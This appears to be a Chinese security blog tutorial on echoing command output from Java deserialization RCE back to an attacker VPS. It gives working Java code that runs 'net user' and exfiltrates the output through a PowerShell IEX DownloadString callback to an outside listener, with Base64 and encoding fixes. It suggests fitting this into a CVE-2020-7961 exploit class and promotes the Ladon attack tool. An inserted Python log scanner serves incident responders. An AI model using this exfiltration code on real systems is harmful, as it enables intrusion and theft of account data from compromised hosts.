Introduction
In Java deserialization vulnerabilities, some cases cannot echo the result directly, so the result has to be sent out of band over web, FTP, DNS and so on. I don't like sending my results to someone else's website, so this post shows how to echo the result back to your own VPS. The post is mainly Java code; other command execution vulnerabilities work the same way.
Start the web server
```
Ladon web 9001
```
Execute a command in Java
```
javac main.java & java main
```
Note: when submitting via GET, newline characters must be replaced with some other character.
```java
import java.io.BufferedReader;
import java.io.InputStreamReader;

public class main {
    public static void main(String[] args) {
        Runtime runtime = Runtime.getRuntime();
        try {
            // Run the command and collect its output line by line
            BufferedReader br = new BufferedReader(new InputStreamReader(runtime.exec("net user").getInputStream()));
            String line = null;
            StringBuffer b = new StringBuffer();
            while ((line = br.readLine()) != null) {
                b.append(line + " "); // join with spaces: a newline cannot be placed in a GET path
            }
            System.out.println(b.toString());
            // Submit the collected output to the listener as a path segment under /getstr/
            String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/getstr/", b.toString(), "')"};
            //java.lang.Runtime.getRuntime().exec(cmd).waitFor();
            java.lang.Runtime.getRuntime().exec(cmd);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
![view image over http]()
Returning multi-line results
Returning only the whoami result works fine, but multi-line output cannot be submitted; the cause is the newline characters, so leave newlines out.
Returned result: in K8飞刀 versions before 8.0, decode it with URL decoding (UTF-8); the next version of Ladon will need to parse it, or use a POST submission.
![view image over http]()
Submitting via Base64
http://192.168.1.126:9001/getbase64 — the submitted result is Base64-encoded
http://192.168.1.126:9001/debase64 — decodes the submitted Base64 result
Note: the submission must not contain spaces, otherwise Ladon cannot decode it.
```java
//main.java
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Base64.Encoder;
import java.util.Base64; //jdk 1.8

public class main {
    public static void main(String[] args) {
        Runtime runtime = Runtime.getRuntime();
        try {
            // Run the command and collect its output line by line
            BufferedReader br = new BufferedReader(new InputStreamReader(runtime.exec("net user").getInputStream()));
            String line = null;
            StringBuffer b = new StringBuffer();
            while ((line = br.readLine()) != null) {
                b.append(line + " ");
            }
            System.out.println(b.toString());
            // Base64-encode the output so it can be carried in the URL path
            Encoder encoder = Base64.getEncoder();
            byte[] encode = encoder.encode(b.toString().getBytes());
            String encodeStr = new String(encode);
            System.out.println(encodeStr);
            //String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/getstr/", b.toString(), "')"};
            // Note: encodeStr is a separate array element here, which produces an extra space (see below)
            String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/debase64/", encodeStr, "')"};
            //java.lang.Runtime.getRuntime().exec(cmd).waitFor();
            java.lang.Runtime.getRuntime().exec(cmd);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
Written this way, an extra space appears (each array element becomes a separate argument, and on Windows Runtime.exec joins them with spaces):
```java
String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/debase64/", encodeStr, "')"};
```
![view image over http]()
Written this way there is no space:
```java
String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/debase64/" + encodeStr, "')"};
```
![view image over http]()
Fixing garbled Chinese characters
Encode the submitted Base64 result from UTF-8 bytes:
```java
Encoder encoder = Base64.getEncoder();
//byte[] encode = encoder.encode("hello".getBytes("UTF-8"));
byte[] encode = encoder.encode(b.toString().getBytes("UTF-8")); // explicit charset, so non-ASCII output survives
String encodeStr = new String(encode);
System.out.println(encodeStr);
```
![view image over http]()
Perfect echo
Because the submission is Base64-encoded, any character is allowed, so we can put the newlines back and get a perfect echo.
The echo solution for other vulnerabilities is the same, including but not limited to web vulnerabilities; this post just uses a Java deserialization vulnerability as the example.
```java
//main.java
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Base64.Encoder;
import java.util.Base64; //jdk 1.8

public class main {
    public static void main(String[] args) {
        Runtime runtime = Runtime.getRuntime();
        try {
            // Run the command and collect its output line by line
            BufferedReader br = new BufferedReader(new InputStreamReader(runtime.exec("net user").getInputStream()));
            String line = null;
            StringBuffer b = new StringBuffer();
            while ((line = br.readLine()) != null) {
                b.append(line + "\n"); // newlines are fine now: Base64 hides them from the URL
            }
            System.out.println(b.toString());
            Encoder encoder = Base64.getEncoder();
            byte[] encode = encoder.encode(b.toString().getBytes());
            String encodeStr = new String(encode);
            System.out.println(encodeStr);
            // Concatenate encodeStr into the same element so no extra space is inserted
            String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/debase64/" + encodeStr, "')"};
            //java.lang.Runtime.getRuntime().exec(cmd).waitFor();
            java.lang.Runtime.getRuntime().exec(cmd);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
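On the receiving side, the callbacks described above leave a clear trace in the listener's access log: a request whose path segment under /getstr/ or /debase64/ is the command output itself. The following added example (my own code, not Ladon's or the post's) scans constructed Common Log Format lines, recovers the submitted output by URL-decoding or Base64-decoding the segment, and returns one finding per callback; the endpoint names, the listener IP and the sample log lines are assumed from this post.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Request line of a Common Log Format entry, capturing the callback endpoint
# used in this post and the path segment that carries the command output.
REQ_RE = re.compile(r'"(?:GET|POST) /(getstr|getbase64|debase64)/([^ ?"]+)')

def decode_b64_segment(segment: str) -> Optional[str]:
    """Decode a Base64 path segment as UTF-8 (the charset the post settles on),
    tolerating the URL-safe alphabet and missing '=' padding. Returns None if
    the segment is not valid Base64, so ordinary paths are not flagged."""
    s = unquote(segment).replace("-", "+").replace("_", "/")
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def find_exfil(log_text: str) -> List[Dict[str, Optional[str]]]:
    """Return one finding per callback request: client IP, endpoint hit and
    the recovered command output (None when the segment could not be decoded)."""
    findings = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        endpoint, segment = m.groups()
        if endpoint == "getstr":
            recovered = unquote(segment)  # plain text, URL-encoded by the client
        else:
            recovered = decode_b64_segment(segment)
        findings.append({"client": line.split(" ", 1)[0],
                         "endpoint": endpoint, "recovered": recovered})
    return findings

# Constructed sample log lines (not real traffic). The Base64 segment decodes to
# "Administrator\nGuest\n", the kind of multi-line `net user` output the post echoes.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /debase64/QWRtaW5pc3RyYXRvcgpHdWVzdAo= HTTP/1.1" 200 0
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /getstr/win-srv%5Cbob HTTP/1.1" 200 0
"""

if __name__ == "__main__":
    for f in find_exfil(SAMPLE_LOG):
        print(f"{f['client']} -> /{f['endpoint']}/ : {f['recovered']!r}")
```

The same scan applied to a web server's real access log shows at a glance which host called back and what it reported, which is what an incident responder needs to scope a compromise that used this echo channel.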
Modify the code above slightly and integrate it into the following POC, for example for the CVE-2020-7961 RCE vulnerability, then compile it into a class file.
```java
//LifExp.java
public class LifExp {
    static {
        try {
            String[] cmd = {"cmd.exe", "/c", "calc.exe"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
![view image over http]()
Download
LadonGo (all OS)
https://github.com/k8gege/LadonGo/releases
Ladon (Windows & Cobalt Strike)
Previous versions: https://github.com/k8gege/Ladon/releases
Version 7.0: http://k8gege.org/Download
Version 8.0: K8小密圈
Reprint notice
K8 blog posts may be freely reprinted; please credit the source! © K8gege http://k8gege.org